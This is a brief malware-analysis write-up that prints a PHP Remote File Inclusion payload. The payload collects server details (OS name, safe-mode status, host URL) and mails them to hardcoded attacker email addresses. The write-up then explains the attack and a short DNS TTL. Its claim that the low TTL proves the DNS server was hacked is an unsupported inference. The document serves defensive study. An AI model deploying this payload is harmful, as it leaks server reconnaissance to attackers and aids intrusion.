Dissecting Sample No - 12

;

//=================================
//
// scan inb0x hotmail v3.0
//
// coded by FilhOte_Ccs and LOST
// re-c0d3d by delet
//
//
//=================================
//
ini_set("max_execution_time",-1);
set_time_limit(0);
$user = @get_current_user();
$UNAME = @php_uname();
$SafeMode = @ini_get('safe_mode');
if ($SafeMode == ``) { $SafeMode = "OFF"; }
else { $SafeMode = " $SafeMode "; }
$delet=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
$dados=("Maquina = " . $UNAME . "
Seguran?a = " . $SafeMode . "
http://" . $delet . "

Muito obrigado: SCOTAO");
$email = "paull0_tec@hotmail.com";
$assunto = "b0x";
$email1 = "b4rth2012@hotmail.com";
$headers = "From: %lt;$email>";
$headers = "MIME-Version: 1.0";
$headers .= "Content-type: text/html; charset=iso-8859-1";
if(mail($email1,$assunto,$dados,$headers)){
echo "Isso, ja foi!";
exit();
}
else{
echo "N?o foi.";
exit();
}


This sample is an inclusion file example for Remote File Inclusion attack via FTP. The attacker forces your
system to download these contents via FTP and execute in your system. Another point is, the DNS record of
the victim host:
name class type data time to live
cmddeenvio.zxq.net IN A 67.220.217.230 120s (00:02:00)

Please note that TTL value is only 2 minutes. That means, the primary DNS server of the domain is also
hacked by this hacker. Therefore, he is able to modify mentioned domain's DNS records as he wishes.
Here in this example, attacker defined a TTL value just for 2 minutes. The purpose is, after he completed his
attacks it will expire. And then you'll not be able find any DNS answer, when you try to find IP number of this host.

So, if you're running a DNS server, you must make it extremely safe.